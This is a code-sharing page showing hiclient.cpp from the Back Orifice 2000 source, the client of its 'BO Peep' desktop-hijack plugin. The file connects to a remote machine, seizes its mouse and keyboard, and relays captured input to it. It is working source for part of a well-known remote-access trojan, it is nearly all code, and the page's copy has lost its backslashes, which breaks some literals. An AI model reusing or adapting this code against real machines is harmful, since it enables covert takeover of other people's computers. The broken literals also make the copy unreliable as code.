开通博客赚积分
发布资源赚积分
分类

源码开发语言/平台
当前位置:首页 > 源码/资料 > Internet/网络编程 > 远程控制编程 > 查看源码
hiclient.cpp
资源名称:bo2ksrc.zip [点击查看]
上传用户:jinandeyu
上传日期:2007-01-05
资源大小:620k
文件大小:19k
源码类别:

远程控制编程

开发平台:

WINDOWS

hiclient.cpp:源码内容
  1. /*  Back Orifice 2000 - Remote Administration Suite
  2.     Copyright (C) 1999, Cult Of The Dead Cow
  4.     This program is free software; you can redistribute it and/or modify
  5.     it under the terms of the GNU General Public License as published by
  6.     the Free Software Foundation; either version 2 of the License, or
  7.     (at your option) any later version.
  9.     This program is distributed in the hope that it will be useful,
  10.     but WITHOUT ANY WARRANTY; without even the implied warranty of
  11.     MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
  12.     GNU General Public License for more details.
  14.     You should have received a copy of the GNU General Public License
  15.     along with this program; if not, write to the Free Software
  16.     Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA  02111-1307  USA
  18. The author of this program may be contacted at dildog@l0pht.com. */
  20. #include<windows.h>
  21. #include<commctrl.h>
  22. #include<plugins.h>
  23. #include<bocomreg.h>
  24. #include<auth.h>
  25. #include<iohandler.h>
  26. #include<encryption.h>
  27. #include<config.h>
  28. #include"bo_peep.h"
  29. #include"hiclient.h"
  30. #include"resource.h"
  33. typedef struct {
  34. // Windows
  35. HWND hParent;
  36. HWND hDialog;
  38. // Move tick timing
  39. DWORD dwLastMoveTick;
  40. DWORD dwMoveTickDiff;
  42. // Remote switch
  43. BOOL bRemote;
  44. BOOL bOwnedMouse;
  45. BOOL bOwnedKeybd;
  46. HWND hwndRemInput;
  48. // Misc
  49. CAuthSocket *pSock;
  50. WORD wFlags;
  51. HICON hiMouse;
  52. HICON hiKeybd;
  53. HCURSOR hcInactive;
  54. char svCaption[32];
  55. } HIJACK_CONTEXT;
  58. // HijackConnect: Prompts the user for connection information,
  59. // connects an authenticated socket, and updates the dialog box
  61. int HijackConnect(HIJACK_CONTEXT *hjcontext) 
  62. {
  63. // Update dialog box
  64. SendDlgItemMessage(hjcontext->hDialog,IDC_CONNECT,BM_SETCHECK,BST_CHECKED,0);
  65. SendDlgItemMessage(hjcontext->hDialog,IDC_CONNECT,WM_SETTEXT,0,(LPARAM)"Disconnect");
  67. // Create connection socket
  68. CAuthSocket *pSock=ConnectAuthSocket(InteractiveConnect,0,hjcontext->hDialog,
  69. GetCfgStr(g_szAdvancedOptions,"Hijack Bind Str"),
  70. GetCfgStr(g_szAdvancedOptions,"Hijack Net Module"),
  71. GetCfgStr(g_szAdvancedOptions,"Hijack Encryption"),
  72. GetCfgStr(g_szAdvancedOptions,"Hijack Auth"));
  74. if(pSock==NULL) {
  75. SendDlgItemMessage(hjcontext->hDialog,IDC_CONNECT,BM_SETCHECK,BST_UNCHECKED,0);
  76. SendDlgItemMessage(hjcontext->hDialog,IDC_CONNECT,WM_SETTEXT,0,(LPARAM)"Connect...");
  77. return 0;
  78. } else if(pSock==(CAuthSocket *)0xFFFFFFFF) {
  79. SendDlgItemMessage(hjcontext->hDialog,IDC_CONNECT,BM_SETCHECK,BST_UNCHECKED,0);
  80. SendDlgItemMessage(hjcontext->hDialog,IDC_CONNECT,WM_SETTEXT,0,(LPARAM)"Connect...");
  81. return -1;
  82. }
  84. hjcontext->pSock=pSock;
  86. char svAddr[256];
  87. pSock->GetRemoteAddr(svAddr,256);
  88. lstrcpyn(hjcontext->svCaption, svAddr, 32);
  90. // Set up buttons
  91. SendDlgItemMessage(hjcontext->hDialog,IDC_OWNMOUSE,BM_SETCHECK,BST_UNCHECKED,0);
  92. SendDlgItemMessage(hjcontext->hDialog,IDC_OWNKEYBD,BM_SETCHECK,BST_UNCHECKED,0);
  93. EnableWindow(GetDlgItem(hjcontext->hDialog,IDC_OWNMOUSE),TRUE);
  94. EnableWindow(GetDlgItem(hjcontext->hDialog,IDC_OWNKEYBD),TRUE);
  96. return 1;
  97. }
  99. // HijackDisconnect: Shuts down any socket, and updates the dialog box
  101. BOOL HijackDisconnect(HIJACK_CONTEXT *hjcontext)
  102. {
  103. if(hjcontext->pSock==NULL) return FALSE;
  105. hjcontext->pSock->Close();
  106. delete hjcontext->pSock;
  107. hjcontext->pSock=NULL;
  109. SendDlgItemMessage(hjcontext->hDialog,IDC_CONNECT,BM_SETCHECK,BST_UNCHECKED,0);
  110. SendDlgItemMessage(hjcontext->hDialog,IDC_CONNECT,WM_SETTEXT,0,(LPARAM)"Connect...");
  112. SendDlgItemMessage(hjcontext->hDialog,IDC_OWNMOUSE,BM_SETCHECK,BST_UNCHECKED,0);
  113. SendDlgItemMessage(hjcontext->hDialog,IDC_OWNKEYBD,BM_SETCHECK,BST_UNCHECKED,0);
  114. EnableWindow(GetDlgItem(hjcontext->hDialog,IDC_OWNMOUSE),FALSE);
  115. EnableWindow(GetDlgItem(hjcontext->hDialog,IDC_OWNKEYBD),FALSE);
  117. return TRUE;
  118. }
  120. // IssueHijackCommand: Issues a command to the server and optionally waits for a response
  122. BOOL IssueHijackCommand(HIJACK_CONTEXT *hjcontext, HIJACK_HEADER *phh, int nHdrSize=sizeof(HIJACK_HEADER), char *svFailMsg=NULL, BOOL bWait=FALSE)
  123. {
  124. HIJACK_HEADER *phh2;
  125. int nRet,nSize;
  127. if(hjcontext->pSock==NULL) return FALSE;
  129. // Send request
  130. while((nRet=hjcontext->pSock->Send((BYTE *)phh,nHdrSize))==0) Sleep(0);
  131. if(nRet<0) {
  132. MessageBox(hjcontext->hDialog,"Error sending request. Connection lost.","Connection error",MB_OK|MB_ICONINFORMATION|MB_TOPMOST|MB_SETFOREGROUND);
  133. HijackDisconnect(hjcontext);
  134. return FALSE;
  135. }
  137. // Wait for response
  138. if(bWait) {
  139. while((nRet=hjcontext->pSock->Recv((BYTE **)&phh2,&nSize))==0) Sleep(0);
  140. if(nRet<0) {
  141. MessageBox(hjcontext->hDialog,"Error sending request. Connection lost.","Connection error",MB_OK|MB_ICONINFORMATION|MB_TOPMOST|MB_SETFOREGROUND);
  142. HijackDisconnect(hjcontext);
  143. return FALSE;
  144. }
  145. if(nSize<sizeof(HIJACK_HEADER)) return FALSE;
  147. // Check success/failure
  148. if(svFailMsg) {
  149. if(phh2->bAction==HA_FAILURE) {
  150. MessageBox(hjcontext->hDialog,svFailMsg,"Permission denied",MB_OK|MB_ICONINFORMATION|MB_TOPMOST|MB_SETFOREGROUND);
  151. return FALSE;
  152. }
  153. }
  154. }
  156. return TRUE;
  157. }
  160. // ClientGoLocal: Switches control back to the local machine
  162. void ClientGoLocal(HIJACK_CONTEXT *hjcontext)
  163. {
  164. // Close capture window
  165. if(hjcontext->hwndRemInput!=NULL) {
  166. DestroyWindow(hjcontext->hwndRemInput);
  167. hjcontext->hwndRemInput=NULL;
  168. }
  170. hjcontext->bRemote=FALSE;
  171. }
  173. // ClientGoRemote: Switches control to the remote machine
  175. void ClientGoRemote(HIJACK_CONTEXT *hjcontext)
  176. {
  177. // Ensure we have something owned
  178. if(!(hjcontext->bOwnedMouse || hjcontext->bOwnedKeybd)) {
  179. ClientGoLocal(hjcontext);
  180. return;
  181. }
  183. // Ensure input capture window exists
  184. if(hjcontext->hwndRemInput==NULL) {
  185. hjcontext->hwndRemInput=CreateWindowEx(WS_EX_TRANSPARENT,"REMOTEMOUSE",hjcontext->svCaption,WS_POPUP|WS_MAXIMIZE|WS_VISIBLE,0,0,GetSystemMetrics(SM_CXSCREEN),GetSystemMetrics(SM_CYSCREEN),NULL,NULL,g_hInstance,hjcontext);
  186. if(hjcontext->hwndRemInput==NULL) return;
  187. }
  189. BringWindowToTop(hjcontext->hwndRemInput);
  190. SetFocus(hjcontext->hwndRemInput);
  192. hjcontext->bRemote=TRUE;
  193. }
  196. // ClientOwnDevice: Owns or frees a remote device
  198. void ClientOwnDevice(HIJACK_CONTEXT *hjcontext, int nDevice, BOOL bOwn)
  199. {
  200. HIJACK_HEADER hh;
  201. char *svFailMsg;
  203. // Create own/free request
  204. if(bOwn) hh.bAction=HA_OWNDEVICE;
  205. else hh.bAction=HA_FREEDEVICE;
  207. hh.bDevice=(BYTE)nDevice;
  209. if(bOwn && nDevice==HD_MOUSE) svFailMsg="Mouse could not be owned.";
  210. if(!bOwn && nDevice==HD_MOUSE) svFailMsg="You do not own the mouse.";
  211. if(bOwn && nDevice==HD_KEYBD) svFailMsg="Keyboard could not be owned.";
  212. if(!bOwn && nDevice==HD_KEYBD) svFailMsg="You do not own the keyboard.";
  214. // Send request
  215. if(!IssueHijackCommand(hjcontext,&hh,sizeof(HIJACK_HEADER),svFailMsg,TRUE)) return;
  217. // Update internal variables and dialog checkboxes
  218. if(bOwn) {
  219. if(nDevice==HD_MOUSE) {
  220. hjcontext->bOwnedMouse=TRUE;
  221. SendDlgItemMessage(hjcontext->hDialog,IDC_OWNMOUSE,BM_SETCHECK,BST_CHECKED,0);
  222. } else if(nDevice==HD_KEYBD) {
  223. hjcontext->bOwnedKeybd=TRUE;
  224. SendDlgItemMessage(hjcontext->hDialog,IDC_OWNKEYBD,BM_SETCHECK,BST_CHECKED,0);
  225. }
  226. } else {
  227. if(nDevice==HD_MOUSE) {
  228. hjcontext->bOwnedMouse=FALSE;
  229. SendDlgItemMessage(hjcontext->hDialog,IDC_OWNMOUSE,BM_SETCHECK,BST_UNCHECKED,0);
  230. } else if(nDevice==HD_KEYBD) {
  231. hjcontext->bOwnedKeybd=FALSE;
  232. SendDlgItemMessage(hjcontext->hDialog,IDC_OWNKEYBD,BM_SETCHECK,BST_UNCHECKED,0);
  233. }
  234. }
  236. // Update remote status
  237. if(hjcontext->bRemote) ClientGoRemote(hjcontext);
  238. }
  240. // CapInputWndProc: Mouse and keyboard message capture window procedure
  242. LRESULT CALLBACK CapInputWndProc(HWND hwnd, UINT uMsg, WPARAM wParam, LPARAM lParam)
  243. {
  244. HIJACK_CONTEXT *hjcontext=(HIJACK_CONTEXT *)GetWindowLong(hwnd,GWL_USERDATA);
  245. switch(uMsg) {
  246. case WM_NCCREATE: 
  247. {
  248. // Store hijack context
  249. LPCREATESTRUCT lpcs=(LPCREATESTRUCT)lParam;
  250. SetWindowLong(hwnd,GWL_USERDATA,(LONG)lpcs->lpCreateParams);
  251. hjcontext=(HIJACK_CONTEXT *)(lpcs->lpCreateParams);
  252. }
  253. return TRUE;
  254. case WM_ACTIVATE:
  255. {
  256. WORD fActive = LOWORD(wParam);           // activation flag 
  257. BOOL fMinimized = (BOOL) HIWORD(wParam); // minimized flag 
  258. HWND hwndPrevious = (HWND) lParam;       // window handle  
  260. if(fActive==WA_INACTIVE) {
  261. // If window loses focus, we should kill it.
  262. ClientGoLocal(hjcontext);
  263. return TRUE;
  264. }
  265. }
  266. break;
  268. case WM_SETCURSOR:
  269. return (LRESULT) SetCursor(hjcontext->hcInactive);
  272. default:
  273. // ------ Handle mouse input -----------
  274. if(hjcontext->bOwnedMouse) {
  275. BOOL bMouseMsg=TRUE;
  276. HIJACK_HEADER hh;
  277. DWORD dwTick;
  278. memset(&hh,0,sizeof(HIJACK_HEADER));
  280. hh.bDevice=HD_MOUSE;
  282. switch(uMsg) {
  283. case WM_MOUSEMOVE:
  284. dwTick=GetTickCount();
  285. if((dwTick-hjcontext->dwLastMoveTick)>hjcontext->dwMoveTickDiff) {
  286. hh.bAction=HA_MOVE;
  287. hjcontext->dwLastMoveTick=dwTick;
  288. } else bMouseMsg=FALSE;
  289. break;
  290. case WM_LBUTTONDOWN:
  291. hh.bAction=HA_LBUTTONDOWN;
  292. break;
  293. case WM_MBUTTONDOWN:
  294. hh.bAction=HA_MBUTTONDOWN;
  295. break;
  296. case WM_RBUTTONDOWN:
  297. hh.bAction=HA_RBUTTONDOWN;
  298. break;
  299. case WM_LBUTTONUP:
  300. hh.bAction=HA_LBUTTONUP;
  301. break;
  302. case WM_MBUTTONUP:
  303. hh.bAction=HA_MBUTTONUP;
  304. break;
  305. case WM_RBUTTONUP:
  306. hh.bAction=HA_RBUTTONUP;
  307. break;
  308. case WM_LBUTTONDBLCLK:
  309. hh.bAction=HA_LBUTTONDBL;
  310. break;
  311. case WM_MBUTTONDBLCLK:
  312. hh.bAction=HA_MBUTTONDBL;
  313. break;
  314. case WM_RBUTTONDBLCLK:
  315. hh.bAction=HA_RBUTTONDBL;
  316. break;
  317. default:
  318. bMouseMsg=FALSE;
  319. break;
  320. }
  322. if(bMouseMsg) {
  323. hh.mouse.wPosX=(LOWORD(lParam)*65536)/GetSystemMetrics(SM_CXSCREEN);
  324. hh.mouse.wPosY=(HIWORD(lParam)*65536)/GetSystemMetrics(SM_CYSCREEN);
  326. IssueHijackCommand(hjcontext,&hh,sizeof(HIJACK_HEADER));
  327. }
  328. }
  329. // ------ Handle keyboard input ---------
  330. if(hjcontext->bOwnedKeybd) {
  331. BOOL bKeybdMsg=TRUE;
  332. HIJACK_HEADER hh;
  333. memset(&hh,0,sizeof(HIJACK_HEADER));
  334. hh.bDevice=HD_KEYBD;
  336. switch(uMsg) {
  337. case WM_KEYDOWN:
  338. hh.bAction=HA_KEYDOWN;
  339. hh.keybd.dwKeyFlags=0;
  340. break;
  341. case WM_KEYUP:
  342. hh.bAction=HA_KEYUP;
  343. hh.keybd.dwKeyFlags=KEYEVENTF_KEYUP;
  344. break;
  345. case WM_SYSKEYDOWN:
  346. hh.bAction=HA_KEYDOWN;
  347. hh.keybd.dwKeyFlags=0;
  348. break;
  349. case WM_SYSKEYUP:
  350. hh.bAction=HA_KEYUP;
  351. hh.keybd.dwKeyFlags=KEYEVENTF_KEYUP;
  352. break;
  353. default:
  354. bKeybdMsg=FALSE;
  355. break;
  356. }
  358. if(bKeybdMsg) {
  359. hh.keybd.bVirtKey=(BYTE)wParam;
  360. hh.keybd.bScanCode=(BYTE)(lParam>>16);
  361. hh.keybd.dwKeyFlags|=(lParam & (1<<24))?KEYEVENTF_EXTENDEDKEY:0;
  362. IssueHijackCommand(hjcontext,&hh,sizeof(HIJACK_HEADER));
  363. }
  364. }
  365. break;
  366. }
  368. return DefWindowProc(hwnd,uMsg,wParam,lParam);
  369. }
  370.  
  372. // HijackDlgProc: Dialog Procedure for Hijack client
  374. BOOL CALLBACK HijackDlgProc(HWND hwndDlg, UINT uMsg, WPARAM wParam, LPARAM lParam)
  375. {
  376. HIJACK_CONTEXT *hjcontext=(HIJACK_CONTEXT *)GetWindowLong(hwndDlg,GWL_USERDATA);
  378. WORD wID,wNotifyCode;
  379. HWND hwndCtl;
  380. WORD uCmdType, xPos, yPos;
  381. WORD wHotKey;
  383. switch(uMsg) {
  384. case WM_INITDIALOG:
  385. SetWindowLong(hwndDlg,GWL_USERDATA,(LONG)lParam);
  387. // Initialize Hijack context
  388. hjcontext=(HIJACK_CONTEXT *)lParam;
  389. hjcontext->hDialog=hwndDlg;
  391. hjcontext->pSock=NULL;
  392. hjcontext->bRemote=FALSE;
  393. hjcontext->bOwnedMouse=FALSE;
  394. hjcontext->bOwnedKeybd=FALSE;
  395. hjcontext->wFlags=0;
  396. hjcontext->svCaption[0]='';
  397. hjcontext->hiMouse=(HICON)LoadImage(g_hInstance,MAKEINTRESOURCE(IDI_MOUSE),IMAGE_ICON,0,0,LR_DEFAULTSIZE);
  398. hjcontext->hiKeybd=(HICON)LoadImage(g_hInstance,MAKEINTRESOURCE(IDI_KEYBOARD),IMAGE_ICON,0,0,LR_DEFAULTSIZE);
  399. hjcontext->hcInactive=(HCURSOR)LoadImage(g_hInstance,MAKEINTRESOURCE(IDC_INACTIVE),IMAGE_CURSOR,0,0,LR_DEFAULTSIZE);
  400. hjcontext->hwndRemInput=NULL;
  401. hjcontext->dwMoveTickDiff=30;
  402. hjcontext->dwLastMoveTick=GetTickCount();
  404. // Set up bitmap buttons
  405. SendDlgItemMessage(hwndDlg,IDC_OWNMOUSE,BM_SETIMAGE,IMAGE_ICON,(LPARAM)hjcontext->hiMouse);
  406. SendDlgItemMessage(hwndDlg,IDC_OWNKEYBD,BM_SETIMAGE,IMAGE_ICON,(LPARAM)hjcontext->hiKeybd);
  407. SendDlgItemMessage(hjcontext->hDialog,IDC_OWNMOUSE,BM_SETCHECK,BST_UNCHECKED,0);
  408. SendDlgItemMessage(hjcontext->hDialog,IDC_OWNKEYBD,BM_SETCHECK,BST_UNCHECKED,0);
  409. EnableWindow(GetDlgItem(hjcontext->hDialog,IDC_OWNMOUSE),FALSE);
  410. EnableWindow(GetDlgItem(hjcontext->hDialog,IDC_OWNKEYBD),FALSE);
  412. // Set initial hotkey
  413. SendDlgItemMessage(hwndDlg,IDC_HOTKEY,HKM_SETRULES,HKCOMB_NONE|HKCOMB_S,HOTKEYF_ALT|HOTKEYF_CONTROL);
  414. SendDlgItemMessage(hwndDlg,IDC_HOTKEY,HKM_SETHOTKEY,MAKEWORD('Z',HOTKEYF_ALT|HOTKEYF_CONTROL),0);
  415. SendMessage(hwndDlg,WM_SETHOTKEY,MAKEWORD('Z',HOTKEYF_ALT|HOTKEYF_CONTROL),0);
  417. // Set initial mouse movetick
  418. SetDlgItemInt(hwndDlg,IDC_MOUSETIME,hjcontext->dwMoveTickDiff,FALSE);
  420. return TRUE;
  422. case WM_CLOSE:
  423. PostQuitMessage(0);
  424. return TRUE;
  426. case WM_COMMAND:
  427. wNotifyCode = HIWORD(wParam); // notification code 
  428. wID = LOWORD(wParam);         // item, control, or accelerator identifier 
  429. hwndCtl = (HWND) lParam;      // handle of control 
  430. switch(wID) {
  431. case IDC_CONNECT:
  432. if(hjcontext->pSock==NULL) {
  433. if(HijackConnect(hjcontext)==-1) {
  434. MessageBox(hjcontext->hDialog,"Could not connect to Hijack address.n","Connection error",MB_OK|MB_SETFOREGROUND|MB_TOPMOST|MB_ICONWARNING);
  435. }
  436. } else {
  437. HijackDisconnect(hjcontext);
  438. }
  439. return TRUE;
  441. case IDC_HOTKEY:
  442. wHotKey=(WORD)SendDlgItemMessage(hwndDlg,IDC_HOTKEY,HKM_GETHOTKEY,0,0);
  443. if(wHotKey==0) {
  444. wHotKey=MAKEWORD('Z',HOTKEYF_ALT|HOTKEYF_CONTROL);
  445. SendDlgItemMessage(hwndDlg,IDC_HOTKEY,HKM_SETHOTKEY,wHotKey,0);
  446. }
  447. SendMessage(hwndDlg,WM_SETHOTKEY,wHotKey,0);
  448. return TRUE;
  450. case IDC_LOCK:
  451. if(SendDlgItemMessage(hwndDlg,IDC_LOCK,BM_GETCHECK,0,0)==BST_CHECKED) {
  452. SetWindowText(GetDlgItem(hwndDlg,IDC_LOCK),"Save");
  453. EnableWindow(GetDlgItem(hwndDlg,IDC_MOUSETIME),TRUE);
  454. EnableWindow(GetDlgItem(hwndDlg,IDC_MOUSETIMETEXT),TRUE);
  455. EnableWindow(GetDlgItem(hwndDlg,IDC_HOTKEY),TRUE);
  456. EnableWindow(GetDlgItem(hwndDlg,IDC_HOTKEYTEXT),TRUE);
  457. } else {
  458. hjcontext->dwMoveTickDiff=GetDlgItemInt(hwndDlg,IDC_MOUSETIME,NULL,FALSE);
  459. SetWindowText(GetDlgItem(hwndDlg,IDC_LOCK),"Settings...");
  460. EnableWindow(GetDlgItem(hwndDlg,IDC_MOUSETIME),FALSE);
  461. EnableWindow(GetDlgItem(hwndDlg,IDC_MOUSETIMETEXT),FALSE);
  462. EnableWindow(GetDlgItem(hwndDlg,IDC_HOTKEY),FALSE);
  463. EnableWindow(GetDlgItem(hwndDlg,IDC_HOTKEYTEXT),FALSE);
  464. }
  465. return TRUE;
  467. case IDC_OWNMOUSE:
  468. if(SendDlgItemMessage(hwndDlg,IDC_OWNMOUSE,BM_GETCHECK,0,0)==BST_UNCHECKED) {
  469. ClientOwnDevice(hjcontext,HD_MOUSE,TRUE);
  470. } else {
  471. ClientOwnDevice(hjcontext,HD_MOUSE,FALSE);
  472. }
  473. return TRUE;
  476. case IDC_OWNKEYBD:
  477. if(SendDlgItemMessage(hwndDlg,IDC_OWNKEYBD,BM_GETCHECK,0,0)==BST_UNCHECKED) {
  478. ClientOwnDevice(hjcontext,HD_KEYBD,TRUE);
  479. } else {
  480. ClientOwnDevice(hjcontext,HD_KEYBD,FALSE);
  481. }
  482. return TRUE;
  483. }
  484. return FALSE;
  486. case WM_SYSCOMMAND:
  487. uCmdType = wParam;        // type of system command requested 
  488. xPos = LOWORD(lParam);    // horizontal position, in screen coordinates 
  489. yPos = HIWORD(lParam);    // vertical position, in screen coordinates 
  490. switch(uCmdType) {
  491. case SC_HOTKEY:
  492. SetFocus(NULL);
  493. if(hjcontext->bRemote==FALSE) {
  494. ClientGoRemote(hjcontext);
  495. } else {
  496. ClientGoLocal(hjcontext);
  497. }
  498. return TRUE;
  499. }
  500. return FALSE;
  502. case WM_DESTROY:
  504. ClientGoLocal(hjcontext);
  505. if(hjcontext->pSock!=NULL) HijackDisconnect(hjcontext);
  506. DestroyCursor(hjcontext->hcInactive);
  507. DeleteObject(hjcontext->hiKeybd);
  508. DeleteObject(hjcontext->hiMouse);
  509. return TRUE;
  510. }
  512. return FALSE;
  513. }
  515. // HijackThread: Desktop hijacking thread
  517. DWORD WINAPI HijackThread(LPVOID *pArgs)
  518. {
  519. HWND hParent,hHijackDlg;
  521. // Thread housekeeping
  522. InterlockedIncrement(&g_nNumThreads);
  523. hParent=(HWND)pArgs;
  525. // Create context to keep hijack info
  526. HIJACK_CONTEXT *hjcontext=(HIJACK_CONTEXT *) malloc(sizeof(HIJACK_CONTEXT));
  527. if(hjcontext==NULL) {
  528. InterlockedDecrement(&g_nNumThreads);
  529. return -1;
  530. }
  531. hjcontext->hParent=hParent;
  532. hjcontext->pSock=NULL;
  534. // Create mouse capture window class
  535. WNDCLASSEX wndclassex;
  536. wndclassex.cbSize=sizeof(WNDCLASSEX);
  537. wndclassex.style=CS_DBLCLKS;
  538. wndclassex.lpfnWndProc=CapInputWndProc;
  539. wndclassex.cbClsExtra=0;
  540. wndclassex.cbWndExtra=0;
  541. wndclassex.hInstance=g_hInstance;
  542. wndclassex.hIcon=NULL;
  543. wndclassex.hCursor=NULL;
  544. wndclassex.hbrBackground=NULL;
  545. wndclassex.lpszMenuName=NULL;
  546. wndclassex.lpszClassName="REMOTEMOUSE";
  547. wndclassex.hIconSm=NULL;
  548. RegisterClassEx(&wndclassex);
  550. // Create hijack window
  551. hHijackDlg=CreateDialogParam(g_hInstance,MAKEINTRESOURCE(IDD_HIJACKDLG),hParent,HijackDlgProc,(LPARAM)hjcontext);
  553. MSG msg;
  554. while(g_bActive) {
  555. Sleep(20);
  556. // ---------------- Handle message processing ----------------
  557. if(PeekMessage(&msg,NULL,0,0,PM_REMOVE)) {
  558. if(msg.message==WM_QUIT) goto doneclient;
  559. TranslateMessage(&msg);
  560. DispatchMessage(&msg);
  561. }
  563. // --------------- Handle hijack socket ------------------
  564. if(hjcontext->pSock==NULL) continue;
  566. // Get hijack packet header
  567. CAuthSocket *pSock=hjcontext->pSock;
  568. HIJACK_HEADER *pHeader;
  569. int nSize,nRet;
  570. if((nRet=pSock->Recv((BYTE **)&pHeader,&nSize))>0) {
  571. if(nSize<sizeof(HIJACK_HEADER)) {
  572. pSock->Free((BYTE*)pHeader);
  573. continue;
  574. }
  575. // --------- Check for message -----------
  576. if(pHeader->bAction==HA_MESSAGE) {
  577. // Get the hijack message 
  578. BYTE *pData=(BYTE *)malloc(pHeader->message.dwDataLen);
  579. if(pData==NULL) {
  580. pSock->Free((BYTE*)pHeader);
  581. break;
  582. }
  584. int i=0;
  585. while(i<(int)pHeader->message.dwDataLen) {
  586. BYTE *pFrame;
  587. while((nRet=pSock->Recv(&pFrame,&nSize))==0) Sleep(0);
  588. if(nRet<0) {
  589. MessageBox(hHijackDlg,"Hijack connection lost.n","Connection error",MB_OK|MB_SETFOREGROUND|MB_TOPMOST|MB_ICONWARNING);
  590. break;
  591. }
  592. memcpy(pData+i,pFrame,nSize);
  593. pSock->Free(pFrame);
  594. i+=nSize;
  595. }
  596. if(nRet<0) break;
  598. // Display the message
  599. MessageBox(hHijackDlg,(LPCTSTR)pData,"Message From Server:",MB_OK|MB_ICONINFORMATION|MB_TOPMOST|MB_SETFOREGROUND);
  600. free(pData);
  603. // ------------- Clean up -------------
  604. pSock->Free((BYTE *)pHeader);
  605. }
  607. if(nRet<0) {
  608. // Disconnect on error
  609. HijackDisconnect(hjcontext);
  610. }
  611. }
  612. doneclient:;
  613. DestroyWindow(hHijackDlg);
  615. UnregisterClass("REMOTEMOUSE",g_hInstance);
  616. free(hjcontext);
  617. InterlockedDecrement(&g_nNumThreads);
  619. return 0;
  620. }
  623. int CreateHijackClient(HWND hParent)
  624. {
  625. DWORD dwtid;
  626. HANDLE htd;
  628. htd=CreateThread(NULL,0,(LPTHREAD_START_ROUTINE)HijackThread,(LPVOID)hParent,0,&dwtid);
  629. if(htd==NULL) {
  630. return -1;
  631. }
  632. CloseHandle(htd);
  634. return 0;
  635. }